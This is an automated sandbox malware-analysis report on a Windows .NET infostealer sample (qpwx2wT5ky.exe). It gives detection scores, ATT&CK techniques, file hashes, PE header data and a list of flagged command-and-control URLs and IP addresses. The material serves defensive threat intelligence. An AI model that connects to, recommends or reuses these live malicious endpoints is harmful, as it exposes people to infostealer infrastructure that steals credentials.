              External Remote ServicesScheduled TaskStartup ItemsStartup Items311
              Process Injection
              DCSync2
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
              Hidden Users
              Proc Filesystem1
              System Owner/User Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
              Remote System Discovery
              Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              qpwx2wT5ky.exe48%VirustotalBrowse
              qpwx2wT5ky.exe24%MetadefenderBrowse
              qpwx2wT5ky.exe67%ReversingLabsByteCode-MSIL.Infostealer.Racealer
              No Antivirus matches
              SourceDetectionScannerLabelLinkDownload
              2.2.LaunchWinApp.exe.400000.0.unpack100%AviraHEUR/AGEN.1143241Download File
              2.0.LaunchWinApp.exe.400000.0.unpack100%AviraHEUR/AGEN.1143241Download File
              2.0.LaunchWinApp.exe.400000.8.unpack100%AviraHEUR/AGEN.1143241Download File
              2.0.LaunchWinApp.exe.400000.4.unpack100%AviraHEUR/AGEN.1143241Download File
              2.0.LaunchWinApp.exe.400000.7.unpack100%AviraHEUR/AGEN.1143241Download File
              2.0.LaunchWinApp.exe.400000.2.unpack100%AviraHEUR/AGEN.1143241Download File
              2.0.LaunchWinApp.exe.400000.6.unpack100%AviraHEUR/AGEN.1143241Download File
              2.0.LaunchWinApp.exe.400000.3.unpack100%AviraHEUR/AGEN.1143241Download File
              2.0.LaunchWinApp.exe.400000.1.unpack100%AviraHEUR/AGEN.1143241Download File
              2.0.LaunchWinApp.exe.400000.5.unpack100%AviraHEUR/AGEN.1143241Download File
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://91.219.236.139/hdm3prapor2%VirustotalBrowse
              http://91.219.236.139/hdm3prapor0%Avira URL Cloudsafe
              http://185.163.204.22/hdm3prapor100%Avira URL Cloudmalware
              http://194.180.174.147/hdm3prapor1%VirustotalBrowse
              http://194.180.174.147/hdm3prapor0%Avira URL Cloudsafe
              http://185.3.95.153/hdm3prapor0%Avira URL Cloudsafe
              http://159.223.25.220/0%Avira URL Cloudsafe
              http://188.166.1.115/hdm3prapor100%Avira URL Cloudmalware
              No contacted domains info
              NameMaliciousAntivirus DetectionReputation
              http://91.219.236.139/hdm3praportrue
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://185.163.204.22/hdm3praportrue
              • Avira URL Cloud: malware
              unknown
              http://194.180.174.147/hdm3praportrue
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
              http://185.3.95.153/hdm3praportrue
              • Avira URL Cloud: safe
              unknown
              http://159.223.25.220/false
              • Avira URL Cloud: safe
              unknown
              https://t.me/hdm3praporfalse
                high
                http://188.166.1.115/hdm3praportrue
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://upx.sf.netAmcache.hve.16.drfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  188.166.1.115
                  unknownNetherlands
                  14061DIGITALOCEAN-ASNUStrue
                  159.223.25.220
                  unknownUnited States
                  46118CELANESE-USfalse
                  194.180.174.147
                  unknownunknown
                  39798MIVOCLOUDMDtrue
                  91.219.236.139
                  unknownHungary
                  56322SERVERASTRA-ASHUtrue
                  Joe Sandbox Version:34.0.0 Boulder Opal
                  Analysis ID:562520
                  Start date:29.01.2022
                  Start time:00:10:16
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 9m 32s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:qpwx2wT5ky.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:21
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.spyw.expl.evad.winEXE@4/7@0/4
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 90%
                  • Number of executed functions: 53
                  • Number of non-executed functions: 183
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 52.182.143.212
                  • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
                  • Not all processes where analyzed, report is missing behavior information
                  TimeTypeDescription
                  00:12:47API Interceptor5x Sleep call for process: LaunchWinApp.exe modified
                  00:13:44API Interceptor1x Sleep call for process: WerFault.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  188.166.1.115h6u1I93SZ8.exeGet hashmaliciousBrowse
                  • 188.166.1.115/jjbadb0y
                  NDlaaGP5q0.exeGet hashmaliciousBrowse
                  • 188.166.1.115/h_smurf1kman_1
                  NDlaaGP5q0.exeGet hashmaliciousBrowse
                  • 188.166.1.115/h_smurf1kman_1
                  4RUx7FQWiN.exeGet hashmaliciousBrowse
                  • 188.166.1.115/nixsmasterbaks2
                  4RUx7FQWiN.exeGet hashmaliciousBrowse
                  • 188.166.1.115/nixsmasterbaks2
                  33c853d0f6d5467701301b6c4dfcf49da0e556b3ac236.exeGet hashmaliciousBrowse
                  • 188.166.1.115/capibar
                  Wj8JERiagJ.exeGet hashmaliciousBrowse
                  • 188.166.1.115/kumchakl1
                  nisechfoYz.exeGet hashmaliciousBrowse
                  • 188.166.1.115/adu1ps
                  0lSq2R2571.exeGet hashmaliciousBrowse
                  • 188.166.1.115/nixsmasterbaks2
                  0lSq2R2571.exeGet hashmaliciousBrowse
                  • 188.166.1.115/nixsmasterbaks2
                  A9DpoIeVUj.exeGet hashmaliciousBrowse
                  • 188.166.1.115/capibar
                  7qUVGFoJMy.exeGet hashmaliciousBrowse
                  • 188.166.1.115/capibar
                  8WcnybXmhf.exeGet hashmaliciousBrowse
                  • 188.166.1.115/capibar
                  8WcnybXmhf.exeGet hashmaliciousBrowse
                  • 188.166.1.115/capibar
                  uxoLfsJ5KF.exeGet hashmaliciousBrowse
                  • 188.166.1.115/jdiamond13
                  DxcfTywN4C.exeGet hashmaliciousBrowse
                  • 188.166.1.115/capibar
                  ejTD8TmXnK.exeGet hashmaliciousBrowse
                  • 188.166.1.115/capibar
                  eSVxs9XGoW.exeGet hashmaliciousBrowse
                  • 188.166.1.115/capibar
                  PLIWOtd5Xf.exeGet hashmaliciousBrowse
                  • 188.166.1.115/capibar
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  CELANESE-US0B668D0AC89D5DA1526BE831F7B8C3F2AF54C5DBC68C0.exeGet hashmaliciousBrowse
                  • 159.223.25.220
                  Winbox.x86Get hashmaliciousBrowse
                  • 159.223.186.3
                  Winbox.x86Get hashmaliciousBrowse
                  • 159.223.186.3
                  30914_Video_Oynat#U0131c#U0131.apkGet hashmaliciousBrowse
                  • 159.223.187.91
                  8I4YXRv374Get hashmaliciousBrowse
                  • 159.223.5.93
                  sora.arm7Get hashmaliciousBrowse
                  • 159.223.241.43
                  oGisnnrCbrGet hashmaliciousBrowse
                  • 159.223.216.89
                  6zrauELh2gGet hashmaliciousBrowse
                  • 159.223.216.30
                  J5KV0fYCd7Get hashmaliciousBrowse
                  • 159.223.135.220
                  j4FxeZhAX6Get hashmaliciousBrowse
                  • 159.223.135.220
                  vl1NkAIN5cGet hashmaliciousBrowse
                  • 159.223.135.220
                  7QqeR5QinsGet hashmaliciousBrowse
                  • 159.223.135.220
                  g04UQ7DlbCGet hashmaliciousBrowse
                  • 159.223.135.220
                  svJQujYrU3Get hashmaliciousBrowse
                  • 159.223.135.220
                  Fujhi717szGet hashmaliciousBrowse
                  • 159.223.135.220
                  4NjWslvQKMGet hashmaliciousBrowse
                  • 159.223.135.220
                  2gcQJa0WC7Get hashmaliciousBrowse
                  • 159.223.135.220
                  sora.arm7-20211215-2050Get hashmaliciousBrowse
                  • 159.223.211.118
                  DIGITALOCEAN-ASNUScheck.xlsGet hashmaliciousBrowse
                  • 162.243.175.63
                  opastonline.com.xlsGet hashmaliciousBrowse
                  • 162.243.175.63
                  Bg6DyC7lDh.dllGet hashmaliciousBrowse
                  • 128.199.192.135
                  G.dllGet hashmaliciousBrowse
                  • 162.243.175.63
                  GULPPYUMBy.dllGet hashmaliciousBrowse
                  • 128.199.192.135
                  1162545482187818.xlsGet hashmaliciousBrowse
                  • 164.90.147.135
                  AcqQhfewOu.dllGet hashmaliciousBrowse
                  • 128.199.192.135
                  364453688149503140239183.xlsGet hashmaliciousBrowse
                  • 162.243.175.63
                  80_513972285.xlsGet hashmaliciousBrowse
                  • 128.199.192.135
                  Attachment-2801.xlsGet hashmaliciousBrowse
                  • 128.199.192.135
                  CJ68000754184.xlsGet hashmaliciousBrowse
                  • 164.90.147.135
                  DOCUMENT_2801.xlsGet hashmaliciousBrowse
                  • 128.199.192.135
                  DETAILS-145.xlsGet hashmaliciousBrowse
                  • 128.199.192.135
                  imedpub_2.xlsGet hashmaliciousBrowse
                  • 162.243.175.63
                  imedpub_6.xlsGet hashmaliciousBrowse
                  • 164.90.147.135
                  imedpub.com_6.xlsGet hashmaliciousBrowse
                  • 162.243.175.63
                  imedpub_8.xlsGet hashmaliciousBrowse
                  • 164.90.147.135
                  imedpub.com_10.xlsGet hashmaliciousBrowse
                  • 162.243.175.63
                  iMedPub LTD_10.xlsGet hashmaliciousBrowse
                  • 162.243.175.63
                  iMedPub LTD_12.xlsGet hashmaliciousBrowse
                  • 162.243.175.63
                  No context
                  No context
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.9168915727727842
                  Encrypted:false
                  SSDEEP:192:29rIDKfGGcHRUEMm2Fj2K/lg/u7seS274Ita:qrIgkRUEMmCjG/u7seX4Ita
                  MD5:704712E4245884343C1B53D933E0FF6A
                  SHA1:735EC03A19C628348BA75BED82093B1B0CE7A212
                  SHA-256:0E75A303D3BCF10BF5A5769CFF6CB03ADF0D7C65B06302790B3033433224CDC5
                  SHA-512:995834F87714AC2E91235362A2DA6B33CCEC59871C52771C3F85AC3545FB90CE19C58F4666BB58C476F52541FF5F0E04038E8C5B087271B747C6F342382F1146
                  Malicious:false
                  Reputation:low
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.7.9.1.7.6.1.3.5.6.7.3.8.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.7.9.1.7.6.2.2.6.2.9.8.2.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.0.9.6.4.0.7.2.-.a.9.2.9.-.4.4.8.c.-.8.a.6.1.-.c.d.b.9.8.a.6.4.8.8.c.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.e.8.5.8.a.7.7.-.e.2.8.c.-.4.0.0.0.-.8.9.6.b.-.9.d.a.4.9.6.7.6.c.4.2.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.L.a.u.n.c.h.W.i.n.A.p.p...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.L.a.u.n.c.h.W.i.n.A.p.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.5.c.-.0.0.0.1.-.0.0.1.c.-.5.0.6.c.-.1.4.e.c.e.7.1.4.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.0.b.3.9.e.6.e.0.9.8.0.6.7.f.0.a.f.8.5.d.3.6.1.d.5.1.0.7.a.b.2.2.4.d.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):8358
                  Entropy (8bit):3.6892430773725198
                  Encrypted:false
                  SSDEEP:192:Rrl7r3GLNip/p6Nm6Yyj61ugmf8EeS/ENrCpD589b7hsfPJm:RrlsNipB6c6YO6sgmf8EeS/EH7afM
                  MD5:DB040076D87CFF2B5E68679D4C1ED53F
                  SHA1:66CFADBBF5D16B035B0C6215E2CAAF02A43017DD
                  SHA-256:833EAB64A8B988574F0F3A7AD22F53D47CBE0EAB44B9A3E962EA9D4280202B8F
                  SHA-512:AA989CFA5D089DBE760C91EA5BAEFD952AAFF4CAB1D813C6FB77AE47A7B3F3FBC3F6F94D77FFA7271C3F784F0C17BA4E2D3D33B1ABF0A126966BF8E0A33D3499
                  Malicious:false
                  Reputation:low
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.8.0.<./.P.i.d.>.......
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4768
                  Entropy (8bit):4.461867495702939
                  Encrypted:false
                  SSDEEP:48:cvIwSD8zshJgtWI9HXWSC8BzM8fm8M4JRpigWcItFvx+q8vWigWcITDXGnMPrIPe:uITfzkmSNXJARKN32orchad
                  MD5:D1AF0BA5079F3DE14DD7E8051DFB5C05
                  SHA1:97CC0473AD86735F7F628D6888D4D956CE106184
                  SHA-256:D0C5DD19873B1D9B87B8571680CD3F82DA7FCF7B31DBCC54CB35C764ECAD1B9A
                  SHA-512:DBF3ABFC6C8DDE6CBCC5EABDBA57C426C30D611DD5E209E15CA83C724501248E2E5E7466E2F5295B1FEA7B0F50F7AA8868C6BEA634469CD740AEF8C1ED5ADC32
                  Malicious:false
                  Reputation:low
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1363284" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 15 streams, Sat Jan 29 08:13:37 2022, 0x1205a4 type
                  Category:dropped
                  Size (bytes):61158
                  Entropy (8bit):2.4767519839533017
                  Encrypted:false
                  SSDEEP:192:3KmU3CNYulpOCzAoVE/tsu25X0mAJZ8QXqk7xtebbqn10RWWeOAuZ+5ZHTUnDaBC:fSisC8r0+mAJZ8axt2vABsG4FmA
                  MD5:416A11DCE14D66C77506CE1A74542009
                  SHA1:DEA54DFEEF7500324613857BE92392FA40A61202
                  SHA-256:69AF6348A49402738E7EE52678C15E76C67FA123319B11CF32DED5509A324434
                  SHA-512:E541F05F091B39FBA805B22ED62E172988575D02F4225BB8D86A1A0DD15C344D2454AF4D57A905C85F6A54657C2555EA9545AD6396A4C763BC01257D31971277
                  Malicious:false
                  Reputation:low
                  Preview:MDMP....... .......1..a........................(............................0..........`.......8...........T............ ..........................p....................................................................U...........B..............GenuineIntelW...........T.......\......a.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\qpwx2wT5ky.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):617
                  Entropy (8bit):5.347480285514745
                  Encrypted:false
                  SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat92n4M0kvoDLI4MWuCv:ML9E4Ks2wKDE4KhK3VZ9pKhg84jE4Ks
                  MD5:C090C3A5090FDB569FD50003722EDAD4
                  SHA1:878B12213721F0ED188986C03408AEFBD2F0D1AE
                  SHA-256:3D04A30D0B4C7F044488F425F4BBC78573B5AB98B9586A9C99D3760E11ED4955
                  SHA-512:157F60DD6B99B500694DFB13A3186E3F253468E03DED8075B9671337E51E89A208FA35E9263B2C0F6460205FEE89481C8EE36FD7BBCE66BB399F1D27BDF82609
                  Malicious:true
                  Reputation:low
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):1572864
                  Entropy (8bit):4.2740946580710055
                  Encrypted:false
                  SSDEEP:12288:f+ty5r16YgMk9OszLl2/n1dRQAK7WN+A2wo5lKe85v5tk0GHezT/V:Gty5r16YgMk9OsCd
                  MD5:8CE94B0FFC9D2328821B50E5A619DD53
                  SHA1:5F11244FC9C2919CD1E345339803F44F06F0EEAF
                  SHA-256:FD946DB2798FB9ACA18A737898A1CA66C1BA34B9C6AD92FB637CA39822D6B6E5
                  SHA-512:C94F74438963710015DC1CABF57D0E5888EEFC29264EA402DEBD0B4E3AB2245B66E22D0B7295BB7F01A52DAA42F518212C94555344F899C4BEDC732E27FB300D
                  Malicious:false
                  Reputation:low
                  Preview:regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.......................................................................................................................................................................................................................................................................................................................................................D........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):24576
                  Entropy (8bit):4.031260608135238
                  Encrypted:false
                  SSDEEP:384:5r6l5Rftx1HPJ4XYs1Fn87kkPBqXXSeq5QMVyiy+/ql4Lk4jZd1DoXznH7tNAG:56bRftx1vJ4X91F87hBqXCeq5QMVyiyY
                  MD5:216E7FDAF7B821B8B2C10D83992D0236
                  SHA1:9FDF64BF1DE8E4F7493FBBD25268F6320306BFD1
                  SHA-256:218E0B0C02C620819688CA35F8A0A43A10B1424BE922FF80F26A6666976977ED
                  SHA-512:5965CC1C9BED17338D274BAECC6282F7B4687223B4F79B5944EDCE537AFB81F4C386FCB79665B2AEC9D358A486511E67263F30AD14604150AE5D39D24DF6DE1B
                  Malicious:false
                  Reputation:low
                  Preview:regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.......................................................................................................................................................................................................................................................................................................................................................DHvLE.^......Y..............r|..z];..u.vr.........0................... ..hbin................p.\..,..........nk,.Pe...................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .Pe.......... ........................... .......Z.......................Root........lf......Root....nk .Pe.......................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.393740189625997
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  • Win32 Executable (generic) a (10002005/4) 49.78%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  File name:qpwx2wT5ky.exe
                  File size:1128960
                  MD5:c22c0fdbc19dcd4838709bbaca921f56
                  SHA1:4cd9280315ce4ff97cdb95d7dd6d8fcb7715f292
                  SHA256:d72ff8708ffeb9a95f559828938dc1439884e7c224579127418e285b1aa1d235
                  SHA512:207be844380090fdb580bf006dab730643abd4b5a1fafd6d847a2f0831b412294d303399dd23baaf60b47660f326633544fd31ac893acd697bb531767e085943
                  SSDEEP:24576:MeMhSdxLmSbEoA7El4dwcfrQRqXRJ6XjH:MeMhSdxL2oAfd3rRXRJ6TH
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......S..............0..1...........Q... ...`....@.. ...............................x....@................................
                  Icon Hash:00828e8e8686b000
                  Entrypoint:0x51519f
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x53871FEE [Thu May 29 11:54:22 2014 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:v4.0.30319
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x1150840x4a.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1160000x3d4.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1180000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x1150ce0x1c.text
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
